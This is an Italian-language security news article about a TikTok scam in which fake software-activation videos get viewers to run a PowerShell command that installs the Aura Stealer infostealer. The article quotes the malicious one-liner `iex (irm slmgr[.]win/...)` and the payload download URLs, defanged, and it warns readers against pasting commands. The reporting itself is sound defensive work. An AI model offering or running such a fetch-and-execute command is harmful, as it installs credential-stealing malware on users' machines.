Dataconomy IT
  • Notizia
  • Industria
Subscribe
No Result
View All Result
Dataconomy IT
  • Notizia
  • Industria
Subscribe
No Result
View All Result
Dataconomy IT
No Result
View All Result

L’ultima truffa di TikTok insegna agli utenti come infettare i propri PC

byEmre Çıtak
20 Ottobre 2025
in Notizia, Sicurezza Informatica
Home Notizia
Share on FacebookShare on Twitter
Google Preferred Source

I criminali informatici stanno distribuendo malware in grado di rubare informazioni su TikTok utilizzando video camuffati da guide per l’attivazione di software gratuiti. Secondo Computer che dormeXavier Mertens, gestore dell’ISC, ha identificato la campagna in corso, che utilizza un metodo di ingegneria sociale noto come attacco ClickFix per infettare i sistemi informatici. I video, osservati da Computer che dormeaffermano di fornire istruzioni per l’attivazione di software legittimo come Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro e Discord Nitro. La campagna promuove anche servizi fittizi, tra cui “Netflix Premium” e “Spotify Premium”. Mertens ha osservato che questa attività è in gran parte la stessa di una campagna precedentemente osservata dalla società di sicurezza Trend Micro a maggio. I video utilizzano una tecnica di ingegneria sociale che presenta una soluzione apparentemente valida o una serie di istruzioni per indurre gli utenti a compromettere le proprie macchine. Questo attacco ClickFix induce gli utenti a eseguire comandi PowerShell dannosi. Ogni video visualizza un comando di una riga, come `iex (irm slmgr[.]win/photoshop)` e indica agli spettatori di eseguirlo con privilegi di amministratore. Il nome del programma nell’URL viene modificato per corrispondere al software impersonato; una falsa guida di Windows utilizzerebbe un URL contenente “windows” invece di “photoshop”. Quando il comando viene eseguito, PowerShell si connette al sito remoto `slmgr[.]win` per recuperare ed eseguire un altro script PowerShell. Questo script scarica due eseguibili dalle pagine Cloudflare. Il primo, da `https://file-epq[.]pagine[.]dev/updater.exe`, è una variante del malware Aura Stealer. Questo infostealer è progettato per raccogliere credenziali del browser salvate, cookie di autenticazione, dati del portafoglio di criptovaluta e altre credenziali dell’applicazione. I dati rubati vengono quindi caricati sugli aggressori, garantendo loro l’accesso agli account della vittima. Nell’ambito dell’attacco viene scaricato anche un secondo payload, `source.exe`. Secondo Mertens, questo eseguibile compila automaticamente il codice utilizzando il compilatore Visual C# integrato in .NET (`csc.exe`). Il codice risultante viene successivamente iniettato e lanciato direttamente in memoria. Lo scopo specifico di questo carico utile aggiuntivo rimane poco chiaro. Gli utenti che hanno eseguito questi passaggi dovrebbero considerare tutte le loro credenziali compromesse. La linea di condotta consigliata è reimpostare immediatamente le password su tutti i siti e servizi utilizzati per impedire l’accesso non autorizzato all’account e ulteriori furti di dati. Gli attacchi ClickFix sono diventati popolari nell’ultimo anno e vengono utilizzati per distribuire vari ceppi di malware nelle campagne di ransomware e furto di criptovaluta. Come regola generale, gli utenti non dovrebbero mai copiare testo da un sito Web ed eseguirlo in una finestra di dialogo del sistema operativo. Questo avviso include la barra degli indirizzi di Esplora file, il prompt dei comandi, i prompt di PowerShell, il terminale macOS e le shell Linux.


Credito immagine in primo piano

Tags: tiktoktruffa

Related Posts

Microsoft testa la nuova funzionalità di analisi approfondita del PC di Copilot in Windows 11

Microsoft testa la nuova funzionalità di analisi approfondita del PC di Copilot in Windows 11

14 Luglio 2026
OpenAI ritira il browser Atlas per concentrarsi sulla nuova superapp ChatGPT

OpenAI ritira il browser Atlas per concentrarsi sulla nuova superapp ChatGPT

14 Luglio 2026
La perdita di Pixel 11 mostra audaci colori magenta e pesca

La perdita di Pixel 11 mostra audaci colori magenta e pesca

14 Luglio 2026
La casella di ricerca di Windows 11 ottiene meno confusione e più controllo

La casella di ricerca di Windows 11 ottiene meno confusione e più controllo

14 Luglio 2026
L’aggiornamento dell’algoritmo X mira a rendere le risposte più amichevoli

L’aggiornamento dell’algoritmo X mira a rendere le risposte più amichevoli

14 Luglio 2026
Xiaomi presenta il SUV range extender SkyNomad N90

Xiaomi presenta il SUV range extender SkyNomad N90

14 Luglio 2026

Recent Posts

  • Microsoft testa la nuova funzionalità di analisi approfondita del PC di Copilot in Windows 11
  • OpenAI ritira il browser Atlas per concentrarsi sulla nuova superapp ChatGPT
  • La nuova teoria della materia oscura propone due tipi di particelle
  • Il traffico di Ricerca Google è cresciuto del 4% nonostante i rivali dell’intelligenza artificiale
  • La perdita di Pixel 11 mostra audaci colori magenta e pesca

Recent Comments

Nessun commento da mostrare.
Dataconomy IT

COPYRIGHT © DATACONOMY MEDIA GMBH, ALL RIGHTS RESERVED.

  • Sample Page

Follow Us

  • Notizia
  • Industria
No Result
View All Result
Subscribe

This website uses cookies to improve your experience. You can choose to accept or reject them. Visit our Privacy Policy.